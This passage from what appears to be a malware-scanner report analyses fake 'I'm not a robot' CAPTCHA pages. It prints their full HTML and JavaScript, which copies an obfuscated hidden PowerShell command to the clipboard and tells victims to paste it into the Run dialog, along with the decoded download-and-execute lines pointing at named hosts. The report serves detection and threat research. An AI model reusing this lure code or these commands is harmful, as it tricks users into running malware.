margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `PowErsHeLL -W hiddEn \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n",
"ThreatLevel": "High"
}
https://mail.cambodiatouristservice.com/
Total findings: 2
Indicators of Compromise
| Type | Value |
|---|---|
| URL | https://browser.certif-update.website/ |
| URL | https://browser.certif-update.website/ |
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"URL": "https://mail.cambodiatouristservice.com/",
"URLs": [
"https://browser.certif-update.website/",
"https://browser.certif-update.website/"
],
"HTML": "<!DOCTYPE HTML>\r\n<html lang=\"en-US\">\r\n <head>\r\n <meta charset=\"UTF-8\">\r\n <meta http-equiv=\"refresh\" content=\"0; url=https://browser.certif-update.website/\">\r\n <script type=\"text/javascript\">\r\n window.location.href = \"https://browser.certif-update.website/\"\r\n </script>\r\n <title>Loading</title>\r\n </head>\r\n <body>\r\n\t </body>\r\n</html>",
"ThreatLevel": "None"
}
https://my.salviatech.com/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
PowErsHeLL -W hiddEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://my.salviatech.com/",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=",
"Decoded": "iex (iwr 'https://nicostudio.it/pZJHqter.txt' -UseBasicParsing).Content"
},
"URLs": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "PowErsHeLL -W hiddEn \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`;\r",
"ClipboardCommands": "PowErsHeLL -W hiddEn ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification",
"Verify You Are Human",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...dC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
},
"CaptchaElements": [
"ification ID: <span id=\"verification-id\">146820</span>\"",
"} function hideCaptchaLoading() { che",
"} function hideCaptchaCheckbox() { che",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec",
"let checkboxBtn = document.getElementById(\"checkbox\"); let chec",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri",
"let verifywindow = document.getElementById(\"verify-window\"); functi",
"andomNumber(); document.getElementById('verification-id').textContent = veri",
"ect(); document.execCommand(\"copy\"); doc",
"tempTextArea.select(); docum",
"href=\"https://cdnjs.cloudflare.com/ajax/libs/font-",
"</div> <script> let checkb"
],
"HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `PowErsHeLL -W hiddEn \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n",
"ThreatLevel": "High"
}
http://82.146.62.232/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "http://82.146.62.232/",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"URLs": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"ClipboardCommands": "POWerShEll -W h ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification",
"Verify You Are Human",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
},
"CaptchaElements": [
"ification ID: <span id=\"verification-id\">146820</span>\"",
"} function hideCaptchaLoading() { che",
"} function hideCaptchaCheckbox() { che",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec",
"let checkboxBtn = document.getElementById(\"checkbox\"); let chec",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri",
"let verifywindow = document.getElementById(\"verify-window\"); functi",
"andomNumber(); document.getElementById('verification-id').textContent = veri",
"ect(); document.execCommand(\"copy\"); doc",
"tempTextArea.select(); docum",
"href=\"https://cdnjs.cloudflare.com/ajax/libs/font-",
"</div> <script> let checkb"
],
